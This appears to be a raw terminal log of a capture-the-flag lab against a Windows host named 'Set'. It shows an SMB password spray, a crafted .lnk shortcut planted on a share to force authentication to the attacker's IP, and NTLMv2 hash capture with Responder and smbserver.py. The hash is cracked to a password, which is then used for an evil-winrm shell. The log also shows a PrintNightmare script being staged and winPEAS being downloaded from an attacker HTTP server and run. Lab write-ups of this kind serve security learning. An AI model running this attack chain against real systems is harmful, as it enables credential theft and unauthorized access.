[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maxdou:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghancha:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\meghanhol:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\michellewat:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\miriamwar:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\myrtleowe:logon',
[+] 10.10.242.97:445 - 10.10.242.97:445 - Success: '.\myrtleowe:Passw@rd'
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\nataliearm:qwerty',
^C[*] 10.10.242.97:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
after 25 min
myrtleowe:Passw@rd
┌──(kali㉿kali)-[/usr/share/seclists/Passwords/Common-Credentials]
└─$ smbmap -u myrtleowe -p Passw@rd -H 10.10.242.97
[+] IP: 10.10.242.97:445 Name: set.windcorp.thm
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
E$ NO ACCESS Default share
Files READ ONLY
IPC$ READ ONLY Remote IPC
┌──(kali㉿kali)-[~/Set]
└─$ smbclient \\\\10.10.242.97\\Files -U myrtleowe
Password for [WORKGROUP\myrtleowe]: Passw@rd
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 16 17:08:26 2020
.. D 0 Tue Jun 16 17:08:26 2020
Info.txt A 123 Tue Jun 16 17:57:12 2020
10328063 blocks of size 4096. 6184765 blocks available
smb: \> get Info.txt
getting file \Info.txt of size 123 as Info.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Set]
└─$ cat Info.txt
Zip and save your project files here.
We will review them
BTW.
Flag1: THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14}
go to https://www.mamachine.org/mslink/
┌──(kali㉿kali)-[~/Set]
└─$ tar -xzvf mslink_v1.3.tar.gz
Este comando extraerá el contenido del archivo `mslink_v1.3.tar.gz` en el directorio actual. La opción `-x` indica que se debe extraer el archivo, la opción `-z` indica que se debe descomprimir un archivo comprimido con gzip, y la opción `-v` indica que se deben mostrar los mensajes de progreso mientras se extrae el archivo.
mslink_v1.3/
mslink_v1.3/mslink
mslink_v1.3/Makefile
mslink_v1.3/README
mslink_v1.3/mslink.c
┌──(kali㉿kali)-[~/Set]
└─$ ls
Info.txt mslink_v1.3 mslink_v1.3.tar.gz users_final.txt users.xml
┌──(kali㉿kali)-[~/Set]
└─$ cd mslink_v1.3
┌──(kali㉿kali)-[~/Set/mslink_v1.3]
└─$ ls
Makefile mslink mslink.c README
┌──(kali㉿kali)-[~/Set/mslink_v1.3]
└─$ sudo ./mslink -l lala -n witty -i \\\\10.10.242.97\\share -o witty.lnk
[sudo] password for kali:
Création d'un raccourci de type "dossier local" avec pour cible lala
zsh: segmentation fault sudo ./mslink -l lala -n witty -i \\\\10.10.242.97\\share -o witty.lnk
┌──(kali㉿kali)-[~/Set/mslink_v1.3]
└─$ ls
Makefile mslink mslink.c README witty.lnk
┌──(kali㉿kali)-[~/Set/mslink_v1.3]
└─$ zip hook.zip witty.lnk
adding: witty.lnk (stored 0%)
not work download version escrita en bash like this
┌──(kali㉿kali)-[~/Downloads]
└─$ chmod +x mslink_v1.3.sh
┌──(kali㉿kali)-[~/Downloads]
└─$ ./mslink_v1.3.sh -l notimportant -n hook -i \\\\10.8.19.103\\share -o hook.lnk
Création d'un raccourci de type "dossier local" avec pour cible notimportant
┌──(kali㉿kali)-[~/Downloads]
└─$ mv hook.lnk ../Set
┌──(kali㉿kali)-[~/Downloads]
└─$ cd ../Set
┌──(kali㉿kali)-[~/Set]
└─$ ls
hook.lnk Info.txt mslink_v1.2 mslink_v1.2.tar.gz users_final.txt users.xml
┌──(kali㉿kali)-[~/Set]
└─$ rm -r mslink_v1.2
rm: remove write-protected regular empty file 'mslink_v1.2/witty.lnk'? yes
┌──(kali㉿kali)-[~/Set]
└─$ rm -r mslink_v1.2.tar.gz
┌──(kali㉿kali)-[~/Set]
└─$ ls -lah
total 36K
drwxr-xr-x 2 kali kali 4.0K Jan 2 12:21 .
drwxr-xr-x 106 kali kali 4.0K Jan 2 12:18 ..
-rw-r--r-- 1 kali kali 165 Jan 2 12:19 hook.lnk
-rw-r--r-- 1 kali kali 123 Jan 2 11:42 Info.txt
-rw-r--r-- 1 kali kali 1.2K Jan 2 10:42 users_final.txt
-rw-r--r-- 1 kali kali 13K Jan 2 10:29 users.xml
┌──(kali㉿kali)-[~/Set]
└─$ zip hook.zip hook.lnk
adding: hook.lnk (deflated 42%)
┌──(kali㉿kali)-[~/Set]
└─$ smbclient \\\\10.10.242.97\\Files -U myrtleowe
Password for [WORKGROUP\myrtleowe]:
Try "help" to get a list of possible commands.
smb: \> put hook.zip
putting file hook.zip as \hook.zip (0.4 kb/s) (average 0.4 kb/s)
smb: \> ls
. D 0 Mon Jan 2 12:23:47 2023
.. D 0 Mon Jan 2 12:23:47 2023
hook.zip A 261 Mon Jan 2 12:23:47 2023
Info.txt A 123 Tue Jun 16 17:57:12 2020
10328063 blocks of size 4096. 6184274 blocks available
┌──(kali㉿kali)-[~/Set]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.19.103]
Responder IPv6 [fe80::7e18:39ac:d2c6:31b6]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-N9R65QVOOEA]
Responder Domain Name [Z4GF.LOCAL]
Responder DCE-RPC Port [48636]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.242.97
[SMB] NTLMv2-SSP Username : SET\MichelleWat
[SMB] NTLMv2-SSP Hash : MichelleWat::SET:58f0e792208dabc9:D563BF18F3FC74B57D34C71C1C493176:0101000000000000808EACFBA41ED9018E8935FEE9DD805100000000020008005A0034004700460001001E00570049004E002D004E003900520036003500510056004F004F004500410004003400570049004E002D004E003900520036003500510056004F004F00450041002E005A003400470046002E004C004F00430041004C00030014005A003400470046002E004C004F00430041004C00050014005A003400470046002E004C004F00430041004C0007000800808EACFBA41ED901060004000200000008003000300000000000000000000000002000005E431CA5EBD98F5126348040BDC5D09560C5EF67524F061E44D359BA4CED24280A001000000000000000000000000000000000000900200063006900660073002F00310030002E0038002E00310039002E003100300033000000000000000000
[*] Skipping previously captured hash for SET\MichelleWat
[*] Skipping previously captured hash for SET\MichelleWat
:)
let's use smbserver.py too
smb: \> put hook.zip
putting file hook.zip as \hook.zip (0.4 kb/s) (average 0.4 kb/s)
┌──(kali㉿kali)-[~/Set]
└─$ sudo smbserver.py -smb2support share .
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.242.97,50316)
[*] AUTHENTICATE_MESSAGE (SET\MichelleWat,SET)
[*] User SET\MichelleWat authenticated successfully
[*] MichelleWat::SET:aaaaaaaaaaaaaaaa:a6c7a63c90fbd22819a7a6ece456ed9d:01010000000000000037016dcf1ed90100c26a5aa9dc4eaf00000000010010006d005300560044006c00660042006800030010006d005300560044006c00660042006800020010006600610044006200460077004b007500040010006600610044006200460077004b007500070008000037016dcf1ed901060004000200000008003000300000000000000000000000002000005e431ca5ebd98f5126348040bdc5d09560c5ef67524f061e44d359ba4ced24280a001000000000000000000000000000000000000900200063006900660073002f00310030002e0038002e00310039002e003100300033000000000000000000
[*] Closing down connection (10.10.242.97,50316)
[*] Remaining connections []
[*] Incoming connection (10.10.242.97,50317)
[*] AUTHENTICATE_MESSAGE (SET\MichelleWat,SET)
[*] User SET\MichelleWat authenticated successfully
[*] MichelleWat::SET:aaaaaaaaaaaaaaaa:6994eb7354f2bd3f948ebeeab6c61ca8:01010000000000000037016dcf1ed901ccac7e5feabc2eb100000000010010006d005300560044006c00660042006800030010006d005300560044006c00660042006800020010006600610044006200460077004b007500040010006600610044006200460077004b007500070008000037016dcf1ed901060004000200000008003000300000000000000000000000002000005e431ca5ebd98f5126348040bdc5d09560c5ef67524f061e44d359ba4ced24280a001000000000000000000000000000000000000900200063006900660073002f00310030002e0038002e00310039002e003100300033000000000000000000
[*] Closing down connection (10.10.242.97,50317)
[*] Remaining connections []
[*] Incoming connection (10.10.242.97,50318)
[*] AUTHENTICATE_MESSAGE (SET\MichelleWat,SET)
[*] User SET\MichelleWat authenticated successfully
[*] MichelleWat::SET:aaaaaaaaaaaaaaaa:f3319de1a8c89bc7216bc5183bb9f26a:010100000000000080cd996dcf1ed901d8818a24aad333d300000000010010006d005300560044006c00660042006800030010006d005300560044006c00660042006800020010006600610044006200460077004b007500040010006600610044006200460077004b0075000700080080cd996dcf1ed901060004000200000008003000300000000000000000000000002000005e431ca5ebd98f5126348040bdc5d09560c5ef67524f061e44d359ba4ced24280a001000000000000000000000000000000000000900200063006900660073002f00310030002e0038002e00310039002e003100300033000000000000000000
[*] Closing down connection (10.10.242.97,50318)
[*] Remaining connections []
now using john
┌──(kali㉿kali)-[~/Set]
└─$ nano hash_michelle
┌──(kali㉿kali)-[~/Set]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_michelle
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!MICKEYmouse (MichelleWat)
1g 0:00:00:14 DONE (2023-01-02 12:28) 0.06910g/s 991275p/s 991275c/s 991275C/s !)(OPPQR..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
MichelleWat:!!!MICKEYmouse
┌──(kali㉿kali)-[~/Set]
└─$ evil-winrm -i 10.10.242.97 -u MichelleWat -p '!!!MICKEYmouse' -N
Evil-WinRM shell v3.4
Warning: Remote path completion is disabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> ls
*Evil-WinRM* PS C:\Users\MichelleWat\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> ls
Directory: C:\Users\MichelleWat\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/16/2020 2:07 PM 52 Flag2.txt
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> type Flag2.txt
Flag2: THM{690798b1780964f5f51cebd854da5a2ea236ebb5}
┌──(kali㉿kali)-[/tmp/CVE-2021-1675]
└─$ ls
CVE-2021-1675.ps1 nightmare-dll README.md
┌──(kali㉿kali)-[/tmp/CVE-2021-1675]
└─$ cp CVE-2021-1675.ps1 /home/kali/Set
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> upload CVE-2021-1675.ps1
Info: Uploading CVE-2021-1675.ps1 to C:\Users\MichelleWat\Desktop\CVE-2021-1675.ps1
Error: [WinRM::FS::Core::FileTransporter] Upload failed (exitcode: 0), but stderr present
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:51 char:12
+ return $ExecutionContext.SessionState.Path.GetUnresolvedProviderP ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
Cannot bind argument to parameter 'Path' because it is null.
At line:19 char:18
+ if(Test-Path $dst -PathType Container) {
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
Cannot bind argument to parameter 'Path' because it is null.
At line:24 char:41
+ chk_exists = ($exists = Test-Path $dst -PathType Leaf)
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
: ["/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/core/file_transporter.rb:408:in `parse_response'", "/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/core/file_transporter.rb:224:in `check_files'", "/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/core/file_transporter.rb:91:in `block in upload'", "/usr/lib/ruby/3.0.0/benchmark.rb:293:in `measure'", "/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/core/file_transporter.rb:89:in `upload'", "/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/file_manager.rb:143:in `block in upload'", "/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:42:in `shell'", "/usr/share/rubygems-integration/all/gems/winrm-fs-1.3.5/lib/winrm-fs/file_manager.rb:140:in `upload'", "/usr/share/rubygems-integration/all/gems/evil-winrm-3.4/bin/evil-winrm:596:in `block in main'", "/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:42:in `shell'", "/usr/share/rubygems-integration/all/gems/evil-winrm-3.4/bin/evil-winrm:521:in `main'", "/usr/share/rubygems-integration/all/gems/evil-winrm-3.4/bin/evil-winrm:974:in `<top (required)>'", "/usr/bin/evil-winrm:25:in `load'", "/usr/bin/evil-winrm:25:in `<main>'"]
Error: Upload failed. Check filenames or paths
maybe winpeas
┌──(kali㉿kali)-[~/Set]
└─$ cp /home/kali/Downloads/Enterprise/winPEASany_ofs.exe winPEASany_ofs.exe
┌──(kali㉿kali)-[~/Set]
└─$ ls
CVE-2021-1675.ps1 hook.lnk Info.txt users.xml
hash_michelle hook.zip users_final.txt winPEASany_ofs.exe
┌──(kali㉿kali)-[~/Set]
└─$ chmod +x winPEASany_ofs.exe
┌──(kali㉿kali)-[~/Set]
└─$ ls
CVE-2021-1675.ps1 hook.lnk Info.txt users.xml
hash_michelle hook.zip users_final.txt winPEASany_ofs.exe
┌──(kali㉿kali)-[~/Set]
└─$ python3 -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
10.10.242.97 - - [02/Jan/2023 12:46:19] "GET /winPEASany_ofs.exe HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> Invoke-WebRequest http://10.8.19.103:1337/winPEASany_ofs.exe -o winPEASany_ofs.exe
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> ls
Directory: C:\Users\MichelleWat\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/16/2020 2:07 PM 52 Flag2.txt
-a---- 1/2/2023 9:46 AM 1829376 winPEASany_ofs.exe
*Evil-WinRM* PS C:\Users\MichelleWat\Desktop> .\winPEASany_ofs.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
